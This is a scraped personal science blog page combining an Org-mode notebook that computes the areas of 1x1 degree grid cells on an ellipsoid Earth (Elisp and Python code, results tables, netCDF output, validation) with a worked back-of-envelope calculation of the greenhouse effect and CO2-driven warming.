      (ellipsoidrectanglearea a f lon lat dlon dlat))))

(defun ellipsoidrectangleareafromdegnumericalintegration (latdeg sidelength steps)
  "Calculate the rectangle area from the latidute LATDEG and the
  SIDELENGTH given as degrees by adding them in STEPS smaller steps per sidelength."
  (let ((area 0)
        (smallerside (/ (float sidelength)
                        (float steps))))
    (loop for i from 0 to (1- steps) by 1 do
          (message (format "i %f" i))
          (let ((smallerlat (+ latdeg (* smallerside i))))
            ; add stepts times the area since the longitudinal
            ; calculation does not change, so we only need to
            ; calculate in once.
            (setq area (+ area (* steps 
                                  (ellipsoidrectangleareafromdeg
                                   smallerlat smallerside))))))

    area))
; no return value
nil

2.3.2 Results for direct calculation

Table 2: Area of lat-lon “square” with the given sidelength in \(km^2\), direct
latitude ↓ 0.1 1 4
0 123.9203 12391.0741 198026.1548
10 121.9815 12179.9838 193733.6082
20 116.2724 11592.4962 183457.2705
30 106.9937 10649.2503 167557.9088
40 94.4643 9382.6379 146580.1726
45 87.1079 8640.9234 134399.3469
50 79.1019 7834.8158 121219.4843
60 61.4002 6055.4408 92285.3707
70 41.9067 4099.4608 60666.5036
80 21.2036 2025.2137 27301.2374
85 10.5861 962.5255 10264.8590
90 0.1071 107.0494 6844.8700

2.3.3 Results for summing up smaller squares.

  1. 100 squares per area (10 latitude steps)
    Table 3: Area of lat-lon “square” with the given sidelength in \(km^2\) sum 10
    latitude ↓ 0.1 1 4
    0 123.9203 12391.3918 198107.5151
    10 121.9815 12180.3007 193814.7025
    20 116.2724 11592.8099 183537.3359
    30 106.9937 10649.5549 167635.3476
    40 94.4643 9382.9239 146652.3820
    45 87.1079 8641.1954 134467.6868
    50 79.1019 7835.0702 121283.0172
    60 61.4002 6055.6486 92336.3892
    70 41.9067 4099.6076 60701.4093
    80 21.2036 2025.2881 27317.3197
    85 10.5862 962.5611 10270.9364
    90 0.1071 107.0533 6848.9244
  2. 10000 squares per area (100 latitude steps)
    Table 4: Area of lat-lon “square” with the given sidelength in \(km^2\) sum 100
    latitude ↓ 0.1 1 4
    0 123.9203 12391.3950 198108.3283
    10 121.9815 12180.3039 193815.5131
    20 116.2724 11592.8130 183538.1364
    30 106.9937 10649.5580 167636.1220
    40 94.4643 9382.9268 146653.1043
    45 87.1079 8641.1981 134468.3705
    50 79.1019 7835.0727 121283.6529
    60 61.4002 6055.6507 92336.8997
    70 41.9067 4099.6090 60701.7587
    80 21.2036 2025.2888 27317.4807
    85 10.5862 962.5615 10270.9973
    90 0.1071 107.0534 6848.9650
  3. 1000000 squares per area (1000 latitude steps)
    Table 5: Area of lat-lon “square” with the given sidelength in \(km^2\) sum 1000
    latitude ↓ 0.1 1 4
    0 123.9203 12391.3950 198108.3365
    10 121.9815 12180.3039 193815.5213
    20 116.2724 11592.8130 183538.1444
    30 106.9937 10649.5580 167636.1297
    40 94.4643 9382.9268 146653.1115
    45 87.1079 8641.1982 134468.3773
    50 79.1019 7835.0728 121283.6592
    60 61.4002 6055.6507 92336.9048
    70 41.9067 4099.6090 60701.7621
    80 21.2036 2025.2888 27317.4823
    85 10.5862 962.5615 10270.9979
    90 0.1071 107.0534 6848.9654
  4. 10 steps vs 1 step, relative
    Table 6: Area of lat-lon “square” with the given sidelength in \(km^2\) 10 vs. 1
    latitude ↓ 0.1 1 4
    0 0.0000% 0.0026% 0.0411%
    10 0.0000% 0.0026% 0.0419%
    20 0.0000% 0.0027% 0.0436%
    30 0.0000% 0.0029% 0.0462%
    40 0.0000% 0.0030% 0.0493%
    45 0.0000% 0.0031% 0.0508%
    50 0.0000% 0.0032% 0.0524%
    60 0.0000% 0.0034% 0.0553%
    70 0.0000% 0.0036% 0.0575%
    80 0.0000% 0.0037% 0.0589%
    85 0.0000% 0.0037% 0.0592%
    90 0.0000% 0.0037% 0.0592%
  5. 100 steps vs 10 steps, relative
    Table 7: Area of lat-lon “square” with the given sidelength in \(km^2\) 100 vs. 10
    latitude ↓ 0.1 1 4
    0 0.000000% 0.000026% 0.000410%
    10 0.000000% 0.000026% 0.000418%
    20 0.000000% 0.000027% 0.000436%
    30 0.000000% 0.000029% 0.000462%
    40 0.000000% 0.000030% 0.000493%
    45 0.000000% 0.000031% 0.000508%
    50 0.000000% 0.000032% 0.000524%
    60 0.000000% 0.000034% 0.000553%
    70 0.000000% 0.000036% 0.000576%
    80 0.000000% 0.000037% 0.000589%
    85 0.000000% 0.000037% 0.000592%
    90 0.000000% 0.000037% 0.000593%
  6. 1000 steps vs 100 steps, relative
    Table 8: Area of lat-lon “square” with the given sidelength in \(km^2\) 1000 vs 100
    latitude ↓ 0.1 1 4
    0 0.000000% 0.000000% 0.000004%
    10 0.000000% 0.000000% 0.000004%
    20 0.000000% 0.000000% 0.000004%
    30 0.000000% 0.000000% 0.000005%
    40 0.000000% 0.000000% 0.000005%
    45 0.000000% 0.000000% 0.000005%
    50 0.000000% 0.000000% 0.000005%
    60 0.000000% 0.000000% 0.000006%
    70 0.000000% 0.000000% 0.000006%
    80 0.000000% 0.000000% 0.000006%
    85 0.000000% 0.000000% 0.000006%
    90 0.000000% 0.000000% 0.000006%

3 Implementation

This is almost done in the theory. Only thing left to do: Use the algorithm to generate a list of areas per 1° latitude and pass that to a python script which writes it into a netCDF4 file for later usage.

I need a python snippet which takes a list of values from lat 0° to lat 90° as input and turns it into a 360°×180° map.

Or I could just write the data from the elisp code to a file and read that.

3.1 Write data files

<<ellipsoidrectangleareafromdeg>>
(with-temp-file "transcomellipticlat90-sum1000.dat" 
  ; switch to the opened file
  (switch-to-buffer (current-buffer))
  (loop for lat from 0 to 90 do
        (insert (concat (number-to-string lat) " "))
        (insert (number-to-string 
                 (ellipsoidrectangleareafromdegnumericalintegration lat 1 1000)))
        (insert "\n")))
; dang, this is beautiful!
<<ellipsoidrectangleareafromdeg>>
(with-temp-file "transcomellipticlat90-direct.dat" 
  ; switch to the opened file
  (switch-to-buffer (current-buffer))
  (loop for lat from 0 to 90 do
        (insert (concat (number-to-string lat) " "))
        (insert (number-to-string 
                 (ellipsoidrectangleareafromdegnumericalintegration lat 1 1)))
        (insert "\n")))
<<ellipsoidrectangleareafromdeg>>
(with-temp-file "transcomellipticlat90-sum1000vsdirect.dat" 
  ; switch to the opened file
  (switch-to-buffer (current-buffer))
  (loop for lat from 0 to 90 do
        (insert (concat (number-to-string lat) " "))
        (insert (number-to-string 
                 (- (ellipsoidrectangleareafromdegnumericalintegration lat 1 1000) 
                    (ellipsoidrectangleareafromdegnumericalintegration lat 1 1))))
        (insert "\n")))
<<ellipsoidrectangleareafromdeg>>
<<spherearea>>
(with-temp-file "transcomellipticlat90-sum1000vssphere.dat" 
  ; switch to the opened file
  (switch-to-buffer (current-buffer))
  (loop for lat from 0 to 90 do
        (insert (concat (number-to-string lat) " "))
        (insert (number-to-string 
                 (- (ellipsoidrectangleareafromdegnumericalintegration lat 1 1000) 
                    (spherearea lat 1))))
        (insert "\n")))
<<spherearea>>
(with-temp-file "transcomellipticlat90-sphere.dat" 
  ; switch to the opened file
  (switch-to-buffer (current-buffer))
  (loop for lat from 0 to 90 do
        (insert (concat (number-to-string lat) " "))
        (insert (number-to-string (spherearea lat 1)))
        (insert "\n")))
(with-temp-file "transcomellipticlat90-sum1000vssphere.dat" 
  ; switch to the opened file
  (switch-to-buffer (current-buffer))
  (loop for lat from 0 to 90 do
        (insert (concat (number-to-string lat) " "))
        (insert (number-to-string (- (ellipsoidrectangleareafromdegnumericalintegration lat 1 1000) (spheresegmentarea lat 1))))
        (insert "\n")))

3.2 Write datafiles to netcdf and plot them

Now just readout that file as csv

3.2.1 First define the plotstyle

The following codeblock can be summoned into other code via

<<addplotstyle>>
# add map lines
m.drawcoastlines()
m.drawparallels(np.arange(-90.,120.,30.), 
                labels=[False,True,True,False])
m.drawmeridians(np.arange(0.,420.,60.), 
                labels=[True,False,False,True])
m.drawmapboundary(fill_color='aqua')

3.2.2 Now read datafiles

import numpy as np
import pylab as pl
import mpl_toolkits.basemap as bm
import netCDF4 as nc
def singlehemispherelats2map(northernlats):
    """Turn the northern lats (0-90) into a map (180,360)."""
    # duplicate the northernlats
    lats = np.zeros((180, ))
    lats[0:90] = northernlats[:0:-1,1]
    lats[90:] = northernlats[1:,1]
    # and blow them up into a map
    lons = np.ones((360, ))
    lats = np.matrix(lats)
    lons = np.matrix(lons)
    mapscaling = lons.transpose() * lats
    mapscaling = mapscaling.transpose()
    return mapscaling

# first read the file
with open("transcomellipticlat90-sum1000.dat") as f:
    northernlats = np.genfromtxt(f, delimiter=" ")
mapscaling = singlehemispherelats2map(northernlats)  
with open("transcomellipticlat90-sum1000vsdirect.dat") as f:
    northernlats = np.genfromtxt(f, delimiter=" ")
mapscalingdiff = singlehemispherelats2map(northernlats)
with open("transcomellipticlat90-direct.dat") as f:
    northernlats = np.genfromtxt(f, delimiter=" ")
mapscalingdirect = singlehemispherelats2map(northernlats)
with open("transcomellipticlat90-sphere.dat") as f:
    northernlats = np.genfromtxt(f, delimiter=" ")
mapscalingsphere = singlehemispherelats2map(northernlats)
with open("transcomellipticlat90-sum1000vssphere.dat") as f:
    northernlats = np.genfromtxt(f, delimiter=" ")
mapscalingdiffsphere = singlehemispherelats2map(northernlats)

3.2.3 and plot them

# several different plots:
<<plotareamapperpixel>>
<<plotareamapperpixeldirect>>
<<plotareamapperpixelerror>>
<<plotareamapperpixelrelerror>>
<<plotareamapperpixelsphereerror>>
# plot it for representation
m = bm.Basemap()
m.imshow(mapscaling)
bar = pl.colorbar()
bar.set_label("area per pixel [$km^2$]")
<<addplotstyle>>
pl.title("Surface Area 1x1 [$km^2$]")
pl.savefig("eartharea_1x1.png")
pl.close()
print """\n\n#+caption:Area when summing 1000x1000 smaller areas
[[./eartharea_1x1.png]]"""
m = bm.Basemap()
m.imshow(mapscaling)
bar = pl.colorbar()
bar.set_label("area per pixel [$km^2$]")
# summon map style! :)
<<addplotstyle>>
pl.title("Surface Area 1x1, no numerical integration [$km^2$]")
pl.savefig("earthareadirect_1x1.png")
pl.close()
print "\n\n#+caption:Area when using just one square\n[[./earthareadirect_1x1.png]]"
m = bm.Basemap()
m.imshow(mapscalingdiff)
<<addplotstyle>>
bar = pl.colorbar()
bar.set_label("area per pixel [$km^2$]")
pl.title("Surface Area 1x1 difference: sum 1000 vs direct [$km^2$]")
pl.savefig("eartharea1000vs1_1x1.png")  # save as a clean netCDF4 file
pl.close()
print "\n\n#+caption:Difference between summing smaller squares", 
print "and just using one square\n[[./eartharea1000vs1_1x1.png]]"
m = bm.Basemap()
m.imshow(np.log(np.abs(mapscalingdiff/mapscaling)))
<<addplotstyle>>
bar = pl.colorbar()
bar.set_label("relative error per pixel, logarithmic")
pl.title("Surface Area 1x1 diff relative: sum 1000 vs direct")
pl.savefig("eartharea1000vs1rel_1x1.png")  # save as a clean netCDF4 file
pl.close()
print """\n\n#+caption:Relative Area Error by not integrating (logscale)
[[./eartharea1000vs1rel_1x1.png]]"""
m = bm.Basemap()
m.imshow(np.log(np.abs(mapscalingdiffsphere/mapscaling)))
<<addplotstyle>>
bar = pl.colorbar()
bar.set_label("relative error per pixel, logarithmic")
pl.title("Surface Area 1x1 diff relative: sum 1000 vs sphere")
pl.savefig("eartharea1000vssphererel_1x1.png")
pl.close()
print """\n\n#+caption:Relative Error from Sphere (logscale)
[[./eartharea1000vssphererel_1x1.png]]"""

3.2.4 Write the data

<<readcsvareafiles>>  
<<plotareamaps>>
D = nc.Dataset("eartharea.nc", "w")
D.comment = "Created with tm5tools/ct2pyshell/transcomareas.org"
D.createDimension("longitude", 360)
D.createDimension("latitude", 180)
area = D.createVariable("1x1", "f8", ("latitude", "longitude"))
area.units = "km^2"
area.comment = "from 180W to 180E and from 90S to 90N"
area[:] = mapscaling
area = D.createVariable("1x1_1000vs1", "f8", ("latitude", "longitude"))
area.units = "km^2"
area.comment = ("Difference between the direct calculation of the "
"area and summing up 1000x1000 smaller areas."
"from 180W to 180E and from 90S to 90N")
area[:] = mapscalingdiff
area = D.createVariable("1x1_direct", "f8", ("latitude", "longitude"))
area.units = "km^2"
area.comment = ("Area calculated without numerical intergration (bigger errors!). "
"from 180W to 180E and from 90S to 90N")
area[:] = mapscalingdirect
area = D.createVariable("1x1_sphere", "f8", ("latitude", "longitude"))
area.units = "km^2"
area.comment = ("Area calculated on a simple sphere. "
"from 180W to 180E and from 90S to 90N")
area[:] = mapscalingsphere

eartharea_1x1.png

earthareadirect_1x1.png

eartharea1000vs1_1x1.png

eartharea1000vs1rel_1x1.png

eartharea1000vssphererel_1x1.png

4 Validation

4.1 Surface Area of the Earth

Should be around 510 million km²

(let ((s 0))
  (loop for lat from 0 to 90 do
        (setq s (+ s (spherearea lat 1))))
  (/ (* 2 360 s) 1.0e6)) ; million kilometers
514.5026761832414
(let ((s 0))
  (loop for lat from 0 to 90 do
        (setq s (+ s (ellipsoidrectangleareafromdegnumericalintegration lat 1 1))))
  (/ (* 2 360 s) 1.0e6)) ; million kilometers
509.55872913305257
(let ((s 0))
  (loop for lat from 0 to 90 do
        (setq s (+ s (ellipsoidrectangleareafromdegnumericalintegration lat 1 10))))
  (/ (* 2 360 s) 1.0e6)) ; million kilometers
509.57373786401286
(let ((s 0))
  (loop for lat from 0 to 90 do
        (setq s (+ s (ellipsoidrectangleareafromdegnumericalintegration lat 1 1000))))
  (/ (* 2 360 s) 1.0e6)) ; million kilometers
509.5738894527161

4.2 Area of Australia + New Zealand (Transcom Region 10)

Should be around 7,692,024 km² + 269,652 km² = 7,961,676 km²

import netCDF4 as nc
import numpy as np
import pylab as pl

D = nc.Dataset("eartharea.nc")
area = D.variables["1x1"][:]
T = nc.Dataset("../plotting/transcom_regions_ct/regions.nc")
transcom = T.variables["transcom_regions"][:]
mask = transcom[::-1,:] == 10
pl.imshow(mask*area)
bar = pl.colorbar()
bar.set_label("area per pixel [$km^2$]")
pl.title("Area of Australia and New Zealand in [$km^2$] per pixel")
pl.savefig("area-australia.png")
# pl.show()
return np.sum(mask*area)
7976938.58492

area-australia.png

Figure 1: Area of Australia and New Zealand

5 Summary

The area of 1x1 degree pixels on a worldmap in ellipsoid approximation is available in the file eartharea.nc in the variable “1x1”. Visualized it looks like this:

eartharea_1x1.png

Figure 2: Surface Area of the Earth in \(km^2\)

To calculate the emissions from mol/m², just multiply each gridpoint with 106 m²/km² and the gridpoint in the variable:

<<prep>>
import numpy as np
import pylab as pl
import mpl_toolkits.basemap as bm
import netCDF4 as nc
D = nc.Dataset("eartharea.nc")
area = D.variables["1x1"][:]
flux = np.ones((180, 360)) * np.random.normal(0.0, 1.e-6, (180, 360))
emiss = flux*area
m = bm.Basemap()
m.imshow(emiss)
<<addplotstyle>>
bar = pl.colorbar()
bar.set_label("emissions [mol/s]")
pl.title("random flux $0 \pm 1.e-6 \\frac{mol}{m^{2}s}$ turned to random emissions")
filename = "randomemissions.png"
pl.savefig(filename)
print "#+caption: Random emissions in simple lat/lon plot."
print "[[./" +  filename + "]]"
# plot again, with hobo-dyer projection (equal-area)
pl.close()
m = plotmap(emiss)
<<addplotstyle>>
bar = pl.colorbar()
bar.set_label("emissions [mol/s]")
pl.title("random emissions in hobo-dyer projection")
filename = "randomemissionshobo-dyer.png"

pl.savefig(filename)
print """\n\n#+caption: Random Emissions in Hobo Dyer Projection
[[./""" +  filename + "]]"

randomemissions.png

Figure 3: Random emissions in simple lat/lon plot.

randomemissionshobo-dyer.png

Figure 4: Random Emissions in Hobo Dyer Projection

def plotmap(array):
    """Plot an array as map."""
    m = bm.Basemap(projection='cea', lat_ts=37.5)
    ny, nx = array.shape[:2]
    lons, lats = pl.meshgrid(range(-nx/2, nx/2 + nx%2),
                             range(-ny/2, ny/2 + ny%2))
    x, y = m(lons, lats)
    arr = array.copy()
    for i in arr.shape[2:]:
        arr = arr[:,:,0]
    m.pcolormesh(x, y, arr)
    return m

5.1 Landarea

Estimating the land area for a given lat-lon region (this requires a land/sea map in the file t3_regions_landsea.nc, i.e. from TM5-4DVar, see tm5.sf.net).

<<prep>>
import netCDF4 as nc
import numpy as np
import pylab as pl
import mpl_toolkits.basemap as bm


def landarea(lat0, lon0, lat1, lon1):
    """Calculate the land area in the rectangle defined by the
    arguments.

    :param lat0: latitude in degree. Southern Hemisphere negative.
    :param lon0: longitude in degree. East negative.

    :returns: landarea within the rectangle in km^2

    >>> samarea = 17.840 * 1000000 # km^2
    >>> ae = landarea(15, -90, -60, -30)
    >>> 0.99 * samarea < ae < 1.01 * samarea
    True
    """
    lat0idx = int(lat0 + 90)
    lat1idx = int(lat1 + 90)
    if lat0idx > lat1idx:
        tmp = lat1idx
        lat1idx = lat0idx
        lat0idx = tmp
    lon0idx = int(lon0 + 180)
    lon1idx = int(lon1 + 180)
    if lon0idx > lon1idx:
        tmp = lon1idx
        lon1idx = lon0idx
        lon0idx = tmp
    D = nc.Dataset("eartharea.nc")
    T = nc.Dataset("t3_regions_landsea.nc")
    area = D.variables["1x1"][:]
    landfraction05x05 = T.variables["LSMASK"][:]
    landfraction1x1 = np.zeros((180,360)) # latxlon
    for i in range(landfraction1x1.shape[0]):
        for j in range(landfraction1x1.shape[1]):
            landfraction1x1[i,j] = np.mean(landfraction05x05[i*2:i*2+2,:][:,j*2:j*2+2])
    landarea = area * landfraction1x1
    # m = plotmap(landfraction1x1)
    # pl.show()
    # m = plotmap(landarea)
    # pl.show()
    return np.sum(landarea[lat0idx:lat1idx+1,:][:,lon0idx:lon1idx])


if True or __name__ == "__main__":
    import doctest
    doctest.testmod()

6 Notes

6.1 Understanding the macro to turn variables to float

Most of the code snippets here are thanks to ggole in #emacs on irc.freenode.net (What is IRC?).

6.1.1 Single variable

(defmacro turntofloatsingle (var)
  (list 'setq var (list 'float var)))

6.1.2 Backtick notation

<<turntofloat-single>>
(defmacro turntofloatbackticks (&rest vars)
  "Turn a list of items to floats using backtick notation."
  `(progn ,@(mapcar 
             (lambda (var) 
               `(turntofloatsingle ,var)) 
             vars)))

6.1.3 Use Mapcar

<<turntofloat-single>>
(defmacro turntofloat (&rest vars)
  "Turn a list of items to floats (without using backticks)."
  ; cons turns this into a call of progn on the list returned by
  ; mapcar
  (cons 'progn (mapcar 
                (lambda (var) 
                  (list 'turntofloatsingle var))
                vars)))

6.1.4 Common Lisp collect

<<turntofloat-single>>
(defmacro turntofloatcollect (&rest vars)
  "Turn a list of items to floats, using the collect directive of loop."
  ; execute progn on the list returned by the loop
  (cons 'progn 
        ; loop ... collect returns a list of all the loop results.
        (loop for var in vars collect 
              (list 'turntofloatsingle var))))

6.1.5 Explicit List Building

<<turntofloat-single>>

; build the list explicitely to make it easier for me to understand
; what the macro does
(defmacro turntofloatexplicit (&rest vars)
  "Turn a list of items to floats (using explicit list building
instead of mapcar)."
  ; prepare an empty list of function calls
  (let ((funclist '()))
    ; for each variable add a call to the single-item macro
    (loop for var in vars do
          ; (list 'turntofloatsingle var) creates the call to
          ; turntofloatsingle with the variable which is referenced by
          ; var. Push puts that at the beginning of the funclist.
          (push (list 'turntofloatsingle var) funclist))
    ; to ensure the right order of operations, we reverse the funclist
    (setq funclist (reverse funclist))
    ; cons turns this into a call of progn on the list. We need progn,
    ; because the funclist contains multiple function calls.
    (cons 'progn funclist)))

6.1.6 Mapcar and Callf

<<turntofloat-single>>
; Common Lisp Macro to turn the place to a float in one step.
(defmacro turntofloatinline (&rest places)
  "Turn a list of items to floats using an inline function call."
  `(progn ,@(mapcar 
             (lambda (place) 
               `(callf float ,place)) places)))

6.1.7 Test the results

<<turntofloat-collect>>
(setq a 1 b 3.8 c 2)
(turntofloatcollect a b c)
(message (number-to-string c))
AnhangGröße
eartharea-eartharea_1x1.png88.19 KB
eartharea.nc1.98 MB
eartharea.pdf1.19 MB
eartharea-area-australia.png33.3 KB
eartharea-eartharea1000vs1_1x1.png86.35 KB
eartharea-eartharea1000vssphererel_1x1.png98.72 KB
eartharea-eartharea1000vs1rel_1x1.png92.39 KB
eartharea-eartharea_1x1.png88.19 KB
eartharea-earthareadirect_1x1.png90.13 KB
eartharea-randomemissions.png353.01 KB
eartharea-randomemissionshobo-dyer.png239.52 KB
eartharea-segmentellipsoid.png5.39 KB
eartharea-segmentellipsoiddistances.png2.72 KB
eartharea-segmentsphere.png5.24 KB
eartharea.org42.75 KB

Thanks for all the fish

AGU publications published "The world's biggest gamble", a short commentary on how to go on with climate change.

I am hard pressed not to become sarcastic. Not because the commentary is wrong. It’s spot on. But because we, as a species, are …

I’ll stop speaking my mind for now. Let’s hope that hope wins against frustration and our children don’t have to pay too dearly for the idiocy of my generation and the generation before.

Oh well, Happy Halloween and enjoy Samhain.

The greenhouse effect, calculated again

New version: draketo.de/wissen/greenhouse-effect-calculated

PDF

PDF (drucken)

Org (ändern)

I did not want to talk about the greenhouse effect without having checked the math and physics. Therefore I calculated it myself.

If you want all links to work, read the the PDF-version.

The greenhouse effect describes the effect of the atmosphere on Earth’s surface temperature. The simplest example contrasts the surface temperature of a planet without atmosphere to the surface temperature with a single insulating layer above the surface.

The incoming radiation from the Sun provides the earth with a constant source of energy. If it would not get rid of that energy somehow, it would get hotter everyday, eventually melt and vaporize. It’s evident that this does not happen (otherwise we would not be here to think about it).

As shown by \citet{Stefan1879} and \citet{Boltzmann1884}, the total energy emission from a perfect black body (a body which absorbs all incoming radiation) per unit area is given by

\begin{equation} E = \sigma T^4 \end{equation}

with the Stefan–Boltzmann constant

\begin{equation} \sigma = \frac{2 \pi^5 k^4}{15 c^2 h^3} \approx 5.67 \cdot 10^{-8} W m^{-2} K^{-4} \end{equation}

From satellite measurements in the Earth’s orbit we know that the incident solar radiation delivers an average energy flux \(j\) between 1361 \(Wm^{-2}\) during the solar minimum and to 1363 \(Wm^{-2}\) during the solar maximum \citep{KoppSolarConstant2011}.

This radiation hits the cross section of the Earth, the area of a circle with the radius of the Earth: \(\pi R^2\). This is also the energy radiated by the Earth system, as evidenced by the Earth neither melting nor freezing. But this outgoing radiation is perpendicular to the surface, not to the cross section of the Earth. The total surface of a sphere is \(4 \times \pi R^2\), or \(4 \times\) its cross section. So the energy radiated per area is just 25% of the incoming energy: \(σT_{out}^4 = 0.25 \times σT_{in}^4\)

greenhouse-effect due to the difference between directed solar-irradiation and radial earth-radiation

The incident radiation delivers an Energy flux of \(E_i = 1362 Wm^{2}\), so the outgoing radiation of a perfect black body would be \(E_o = 340.5 Wm^{-2}\), which is consistent with a temperature of

\begin{equation} T = \left(\frac{E}{σ}\right)^{\frac{1}{4}} = \left(\frac{340.5 \cdot 15 c^2 h^3}{2 \pi^5 k^4}\right)^{\frac{1}{4}} K \approx \left(\frac{340.5}{5.67 \cdot 10^{-8}}\right)^{\frac{1}{4}} K = 278.623 K \end{equation}

This gives an average surface temperature of

\begin{equation} (278.62 - 273.15) ^\circ C = 5.47 ^\circ C \end{equation}

for a perfectly black Earth without atmosphere.

Due to the simplifications used, this value is \(8 K\) lower than the measured mean sea and land surface temperature of \(14 ^\circ C\) for the base period 1961-90 \citep{Jones1999,Rayner2006}.

Historically the next step after the black body estimation was to take the albedo into account: The amount of incoming radiation reflected directly back into space.

If we take into account that the Earth surface and clouds reflect roughly 30% of the visible light back into space, the Earth only receives roughly 70% of the energy which it needs to radiate back. For details, see \citet{Muller2012} and \citet{Muller2013}.1 The equilibrium temperature changes to 255 Kelvin, which is just about -18 °C. Note that changing the albedo by 1 percent point (to 29% or 31%) would change the temperature by roughly 1 K.

(let* ((albedo 0.3)
       (sol 1362)
       (incoming-watt (* (- 1 albedo) (/ sol 4)))
       (c 3e8)
       (h 6.62607e-34)
       (k 1.38065e-23)
       (pi 3.14159))
  (expt 
   (/ (* incoming-watt 15 c c (expt h 3))
      (* 2 (expt pi 5) (expt k 4)))
   0.25))
254.61953320379396

\begin{equation} T = \left(\frac{E}{σ}\right)^{\frac{1}{4}} = \left(\frac{0.7 \cdot 340.5 \cdot 15 c^2 h^3}{2 \pi^5 k^4}\right)^{\frac{1}{4}} K \approx \left(\frac{238.0}{5.67 \cdot 10^{-8}}\right)^{\frac{1}{4}} K = 254.6 K \end{equation}

There are small additional factors in play:

  • effective temperature (radiation from a star) to air temperature (measured on Earth)
  • emissivity: Common values range from 0.90 to 0.98, with forests and urban areas staying close around 0.95, grassland peaking at 0.95 but with a noticeable tail towards 0.90 and barren soil and sparsely vegetated areas forming a broad distribution between 0.92 and 0.96 \citep{Jin2006}. Snow 0.99 (Wan2002).

But with these we’re still roughly 30 Kelvin away from actual temperatures. These are reached through absorption and radial re-radiation of outgoing energy, which effectively provides the Earth with insulation, most effective in the infrared.

This is what is typically called the greenhouse effect: Infra-red emissions by the Earth are absorbed by greenhouse gases in the atmosphere, so the Earth needs to be warmer to get rid of the same amount of received energy.

Greenhouse gases have a net effect on the temperature, because the outgoing radiation mostly consists of thermal infrared light (TIR), while the incoming radiation mostly consists of near infrared (NIR) visible (VIS) and ultraviolet (UV) light. Let’s take the oldest account of this absorption: \citet[“On the Influence of Carbonic Acid in the Air upon the Temperature of the Ground”]{Arrhenius1896} describes different absorption of moonlight depending on the wavelength of the light. Half this light absorbed in the atmosphere is radiated outwards, the other half inwards.

For the actual calculation, we use more recent results: \citet[„The natural greenhouse effect of atmospheric oxygen (O2)and nitrogen (N2)“]{Hoepfner2012}. They take into account the structure of the atmosphere by building on the well-established Karlsruhe Optimized and Precise Radiative transfer Algorithm (KOPRA).

The publication by \citet[]{Hoepfner2012} showed that Outgoing Longrange Radiation without gas would be 365.7 W/m\(^2\), while with greenhouse gases it is 242.7 W/m\(^2\). That’s a 33.6 % decrease in emission, so we need 1.5 times higher emissions to reach equilibrium. Let’s factor this into the equations, and also use an emissivity of 0.95.

(let* ((albedo 0.3)
       (emiss 0.95)
       (sol 1362)
       (incoming-watt (* (- 1 albedo) (/ sol 4)))
       (c 3e8)
       (h 6.62607e-34)
       (k 1.38065e-23)
       (pi 3.14159))
  (expt 
   (/ (* (/ 365.7 242.7) incoming-watt (/ 1 emiss) 15 c c (expt h 3))
      (* 2 (expt pi 5) (expt k 4)))
   0.25))
       ;; for the numerator
       ;; (* (/ 365.7 242.7) (/ 1 emiss) incoming-watt))
285.7423501045961

\begin{equation} T = \left(\frac{E}{σ}\right)^{\frac{1}{4}} = \left(\frac{\frac{365.7}{242.7} \cdot 0.7\frac{1}{0.95} \cdot 340.5 \cdot 15 c^2 h^3}{2 \pi^5 k^4}\right)^{\frac{1}{4}} K \approx \left(\frac{377.49}{5.67 \cdot 10^{-8}}\right)^{\frac{1}{4}} K = 285.74 K \end{equation}

We get 285.74 K as equilibrium temperature. That’s around 12.6°C, so now we’re just 1.4 Kelvin away from the actual \(14 ^\circ C\) for the base period 1961-90 \citep{Jones1999,Rayner2006}. There are still effects missing in the calculations, but the intention of this guide is not to create a new climate model, but to show the fundamental physical effects. Remember also that changing the surface albedo by 1 percent point (to 29% or 31%) would change the temperature by roughly 1 K, so getting within less than 2 °C of the measured temperature is already pretty good. Going further would require a much stricter treatment of surface albedo that goes into too much detail for an article.

Therefore we’ll round this up with an important test that is only weakly affected by the surface albedo:

What happens if we increase the absorption by CO\(_2\)? Do we see global warming?

For this test the result is already close enough to the measured temperature that we can take the difference between values with different parameters to get the effect of these parameters and remove biases which are present in both values.

To calculate global warming due to doubled CO₂, we cannot just double the absorption, because the absorption bands get saturated. The \citet[IPCC working group 1 (physical science basis)]{IPCCRadiativeForcingMyhre2013} gives the increase in radiative forcing due to increased CO\(_2\) levels from the 1950 concentrations of about 310 ppm to the 2010 concentrations of 390 ppm as about 1.2 W/m\(^2\).2

So let us go at this backwards: \citet{Hoepfner2012} showed the state for 2012, what do our calculations predict for 1950 when we reduce the absorption due to CO\(_2\) by the 1.2 W/m\(^2\) radiative forcing given in the IPCC?3

The unstable emissions would then not be 242.7 W/m\(^2\) as calculated by \citet{Hoepfner2012}, but 243.9 W/m\(^2\).

(let* ((albedo 0.3)
       (sol 1362)
       (emiss 0.95)
       (incoming-watt (* (- 1 albedo) (/ sol 4)))
       (c 3e8)
       (h 6.62607e-34)
       (k 1.38065e-23)
       (pi 3.14159))
  (expt 
   (/ (* (/ 365.7 (+ 242.7 1.2)) incoming-watt (/ 1 emiss) 15 c c (expt h 3))
      (* 2 (expt pi 5) (expt k 4)))
   0.25))
       ;; for the numerator
       ;; (* (/ 365.7 (+ 242.7 1.2)) incoming-watt (/ 1 emiss)))

285.3902331695058

We get 285.39 Kelvin for 1950, about 0.35°C less than for 2010.

This gives an estimate of a 0.35°C increase in temperature from 1950 to 2010 due to increased CO\(_2\) levels alone. If we also remove the added absorption from methane, N\(_{2}O\) and other greenhouse gases emitted by humans (additional forcing of 0.75 W/m\(^2\)), we get 285.17 Kelvin.

So this calculation from basics yields an increase of the equilibrium temperature by 0.57 °C.

\begin{equation} T_{2010} - T_{1950} = 285.74 K - 285.17 K = 0.57 K \end{equation}

This is a bit lower than the increase of 0.65 K to 0.75 K seen in the global temperature records by the Berkeley Earth project,4 and close to the 0.6 to 0.8 K increase shown in the Global (NH+SH)/2 temperature given by HadCRUT4 by the Met Office Hadley Centre by the National Meteorological Service of the United Kingdom.5 But for a calculation from basic principles, that’s pretty good.

So we can conclude that actual measurements match this physical explanation of global warming due to the greenhouse effect — or more exactly: due to increased absorption of infrared radiation by greenhouse gases, with the biggest effect due to CO\(_2\).

The source of climate-active human carbon emissions which influences the CO\(_2\) content of the atmosphere is mostly burning of fossil fuel which is taken from the crust of the Earth and introduced into the carbon cycle. This is what changes the CO\(_2\) concentration.

And with this, we are done.

Please reduce your carbon emissions and become active to get politicians to action on a national and global scale. We’re cutting the branch we live on.

If you want more details, have a look at the IPCC reports. Best start with the executive summary and then go into the details you’re most interested in:

IPCC Climate Change 2013: The Physical Science Basis: https://www.ipcc.ch/report/ar5/wg1/

